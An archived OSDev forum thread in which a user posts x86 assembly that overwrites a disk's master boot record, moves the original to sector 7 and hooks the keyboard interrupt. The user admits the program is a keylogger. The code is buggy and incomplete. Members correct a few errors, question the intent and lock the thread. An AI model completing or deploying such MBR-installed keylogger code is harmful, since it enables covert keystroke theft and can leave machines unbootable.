OSDev.org https://forum.osdev.org/ |
|
hook irq1 installed at MBR https://forum.osdev.org/viewtopic.php?f=13&t=32709 |
Page 1 of 1 |
Author: | Apolo [ Wed Jan 24, 2018 7:46 am ] |
Post subject: | hook irq1 installed at MBR |
i am coding a program that hook teh IRQ 1 and is installed onto MBR and restore teh original MBR that is saved at sector 7 however the OS don't bootstrap. here is my code: Code: org 100h start: MOV AX,201H MOV BX,0E00H MOV CX,1 MOV DX,80H INT 13H MOV AX,301H MOV CX,7 INT 13H MOV SI,int9_installer MOV DI,0E00H MOV CX,1FDH REP MOVSB ES MOV WORD[0FFEH],0AA55h MOV AX,301H MOV CX,1 INT 13H RET int9_installer: cli push es mov ax,0 mov es,ax es mov cx,[24h] es mov dx,[26h] ... mov cx,0 mov dx,2000h es mov [24h],cx es mov [26h],dx pop es sti ... mov si,3100h mov al,10h mov [si],al mov al,0 mov [si+1],al mov al,01 mov [si+2],al mov al,0 mov [si+3],al MOV AX,7C00H mov [si+4],ax mov ax,0h mov [si+6],ax mov ax,7 mov [si+8],ax xor ax,ax mov [si+0ah],ax mov [si+0ch],ax mov [si+0eh],ax mov ah,42h mov dl,80h INT 13H JMP 0:7C00H Where is wrong at my code above??? |
Author: | iansjack [ Wed Jan 24, 2018 10:20 am ] |
Post subject: | Re: hook irq1 installed at MBR |
You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first |
Author: | AJ [ Wed Jan 24, 2018 10:44 am ] |
Post subject: | Re: hook irq1 installed at MBR |
Hi, In addition to iansjack's post, we have eabsolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive). We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be? Cheers, Adam |
Author: | Apolo [ Wed Jan 24, 2018 11:22 am ] |
Post subject: | Re: hook irq1 installed at MBR |
my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value? |
Author: | iansjack [ Wed Jan 24, 2018 11:30 am ] |
Post subject: | Re: hook irq1 installed at MBR |
I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive. And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with. |
Author: | Brendan [ Wed Jan 24, 2018 9:58 pm ] |
Post subject: | Re: hook irq1 installed at MBR |
Hi, Apolo wrote: my code is a keylogger that hook IRQ 1 and is installed onto MBR and teh original MBR is writed at sector 7 to be jmp after my keylogger is installed. org 100h directive is because is written in fasm. how to set direction flag and i should set segment registers to what value? To clear the direction flag, use the CLD instruction. The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assemebler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulful the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero. For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs. Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work. Cheers, Brendan |
Author: | AJ [ Thu Jan 25, 2018 5:19 am ] |
Post subject: | Re: hook irq1 installed at MBR |
That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT and chances are your code will end up in an in-mapped memory page anyway. You'd generally be better off with a hardware key logger but what you are doing may be at best immoral and at worst illegal Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine. Cheers, Adam |
Author: | Apolo [ Fri Jan 26, 2018 4:26 am ] |
Post subject: | Re: hook irq1 installed at MBR |
i think BIOS of my PCs is all infected because i try this code most simple but the PCs don't bootsrap however. see my most simple code: Code: start: MOV AX,201H MOV BX,0E00H MOV CX,1 MOV DX,80H INT 13H MOV CX,7 MOV AX,301H INT 13H MOV CX,1BDH MOV SI,example MOV DI,0E00H REP MOVSB MOV AX,301H MOV BX,0E00H MOV AX,301H MOV CX,1 INT 13H RET example: MOV AX,201H PUSH ES MOV BX,0 MOV ES,BX MOV BX,7C00H MOV CX,7 INT 13H POP ES cs jmp bx codesize: Aaaaaaaaa! what is the problem of my code? |
Author: | iansjack [ Fri Jan 26, 2018 5:15 am ] |
Post subject: | Re: hook irq1 installed at MBR |
The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking. |
Author: | AJ [ Fri Jan 26, 2018 5:24 am ] |
Post subject: | Re: hook irq1 installed at MBR |
You one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected. Cheers, Adam |
Author: | Apolo [ Fri Jan 26, 2018 5:31 am ] |
Post subject: | Re: hook irq1 installed at MBR |
resume: i am trying to bootstrap from sector 7 that is where teh original MBR is writed. can someone help me?? i am desesperate! |
Author: | AJ [ Fri Jan 26, 2018 6:02 am ] |
Post subject: | Re: hook irq1 installed at MBR |
Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes... |
Page 1 of 1 | All times are UTC - 6 hours |
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group http://www.phpbb.com/ |